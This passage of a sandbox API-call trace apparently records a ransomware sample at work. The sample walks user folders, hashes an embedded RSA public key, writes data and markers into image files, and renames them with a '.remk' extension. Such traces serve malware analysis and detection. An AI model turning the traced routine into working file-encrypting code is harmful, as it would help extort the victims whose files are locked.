0xffffffff [0232.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0232.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.789] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.789] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.789] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0232.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.789] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.790] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.790] PathFindFileNameW (pszPath="") returned="" [0232.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 0xffffffff [0232.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.790] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.790] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.790] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0232.790] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0232.790] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0232.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.790] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0232.790] PathFindFileNameW (pszPath="") returned="" [0232.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbff6520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbff6520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0232.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.791] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbff6520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbff6520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0232.791] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0071e40, ftCreationTime.dwHighDateTime=0x1d5e5b5, ftLastAccessTime.dwLowDateTime=0x2beaa8d0, ftLastAccessTime.dwHighDateTime=0x1d5e28e, ftLastWriteTime.dwLowDateTime=0x2beaa8d0, ftLastWriteTime.dwHighDateTime=0x1d5e28e, nFileSizeHigh=0x0, nFileSizeLow=0xc08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6XlUusTFEgTQeKIoy7.jpg", cAlternateFileName="6XLUUS~1.JPG")) returned 1 [0232.791] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6XlUusTFEgTQeKIoy7.jpg") returned=".jpg" [0232.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6XlUusTFEgTQeKIoy7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6xluustfegtqekioy7.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.792] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=3080) returned 1 [0232.792] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.794] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xbe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.794] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.798] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xc08, lpOverlapped=0x0) returned 1 [0232.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.798] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.799] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.799] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.799] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.799] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.799] GetLastError () returned 0x0 [0232.799] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.799] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.799] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.799] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.799] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.800] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.800] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.800] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.800] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.801] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.801] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.801] CloseHandle (hObject=0x640) returned 1 [0232.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0232.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0232.802] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6XlUusTFEgTQeKIoy7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6xluustfegtqekioy7.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6XlUusTFEgTQeKIoy7.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6xluustfegtqekioy7.jpg.remk")) returned 1 [0232.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.803] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.805] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ed6ba0, ftCreationTime.dwHighDateTime=0x1d5d81b, ftLastAccessTime.dwLowDateTime=0x7e353540, ftLastAccessTime.dwHighDateTime=0x1d5e105, ftLastWriteTime.dwLowDateTime=0x7e353540, ftLastWriteTime.dwHighDateTime=0x1d5e105, nFileSizeHigh=0x0, nFileSizeLow=0xea3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9420IVPIIMe9R.png", cAlternateFileName="9420IV~1.PNG")) returned 1 [0232.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.805] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.805] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9420IVPIIMe9R.png") returned=".png" [0232.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9420IVPIIMe9R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9420ivpiime9r.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.805] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=59963) returned 1 [0232.805] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.807] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xea15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.807] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.809] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.809] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.809] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.809] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xea3b, lpOverlapped=0x0) returned 1 [0232.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.810] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.810] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.811] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.811] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.811] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.811] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.811] GetLastError () returned 0x0 [0232.811] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.811] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.811] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.811] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.811] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.811] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.811] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xea40) returned 0x37c2278 [0232.812] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c2130 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee220 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c2178 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee238 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee268 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee280 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.812] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.812] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee268 | out: hHeap=0x630000) returned 1 [0232.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee280 | out: hHeap=0x630000) returned 1 [0232.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee280 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee268 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee280 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee268 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.813] GetCurrentThreadId () returned 0x314 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b93e0 [0232.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 